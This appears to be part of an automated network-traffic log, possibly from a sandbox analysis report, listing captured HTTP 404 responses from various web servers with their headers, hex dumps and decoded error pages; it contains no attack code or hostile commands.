23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Fri, 03 May 2024 18:27:47 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Fri, 03 May 2024 18:27:50 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:29:31 GMTContent-Length: 0Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W8h0scdqQL1m558xztv3tJahR3XEeduvznj%2FdPYtXTCdz8k53A8Bgr8I2Ran4dqgnemyWs00ZeFjoUg8OLwbEspYZ2WiIEUkdW%2BuIsrCqcdeIyjarUCZX7zPieYLg0DGGCM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87e251282c632d13-IADalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:29:34 GMTContent-Length: 0Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jkMxeswrJ81BXb32vToJhoS0yYOhHP5MYzZpxgvtjJaqesSWxueeuqsuOZc9oE1Jn2PvK%2FEKcSLYGSwMzXoyUEPVnSiBAAQ2zzby7E1AEYv%2BirtAP7H87XR7cM3Qs9HCab4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87e251389f24080c-IADalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:29:37 GMTContent-Length: 0Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zIZ94DHn104r3N715Z8Wxrhe%2BjPBITNp7Nkp9gu17hvhHN4N3AtwnlYbVXM4nRfqrV19Pwbare4OULsCVHt6JQFEm5jUk3bkcp%2B%2FJkwQtqr%2FeVIQtouAqo3XADj8wySBBDs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87e251490b732424-IADalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:29:39 GMTContent-Length: 0Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AND6Jvy8qRtsmX8Wh1GRhbeTEshmrOmF%2BwcBP4c1X4xPCiU5R%2FC5UAA5%2BJ7DIDldivEhwCLHTKl2oBLrIq8iYSFgGUS06pre8pge1URv3wm90xTK2%2Ba372xae1XgbuEhwGA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87e251596927690b-IADalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 03 May 2024 18:29:48 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0d 0a Data Ascii: c7<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /9pdo/ was not found on this server.<P></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Fri, 03 May 2024 18:29:53 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,\|hEKZ{XtAo[Y0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Fri, 03 May 2024 18:29:56 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,\|hEKZ{XtAo[Y0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Fri, 03 May 2024 18:29:58 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,\|hEKZ{XtAo[Y0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 601Connection: closeDate: Fri, 03 May 2024 18:30:01 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 44 69 65 20 61 6e 67 65 67 65 62 65 6e 65 20 53 65 69 74 65 20 6b 6f 6e 6e 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 77 65 72 64 65 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 03 May 2024 18:30:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://n-benriya002.com/wp-json/>; rel="https://api.w.org/"Data Raw: 35 66 39 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 6a 61 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 75 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 33 32 30 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6a 73 74 6f 72 6b 2f 6e 2d 66 61 63 74 6f 72 79 2d 63 73 73 2f 66 6f 6f 74 65 72 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6a 73 74 6f 72 6b 2f 6e 2d 66 61 63 74 6f 72 79 2d 63 73 73 2f 70 61 67 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 0a 0a 09 09 3c 21 2d 2d 20 41 6c 6c 20 69 6e 20 4f 6e 65 20 53 45 4f 20 34 2e 35 2e 33 2e 31 20 2d 20 61 69 6f 73 65 6f 2e 63 6f 6d 20 2d 2d 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 20 20 e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 e7 89 87 e4 bb 98 e3 81 91 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 7
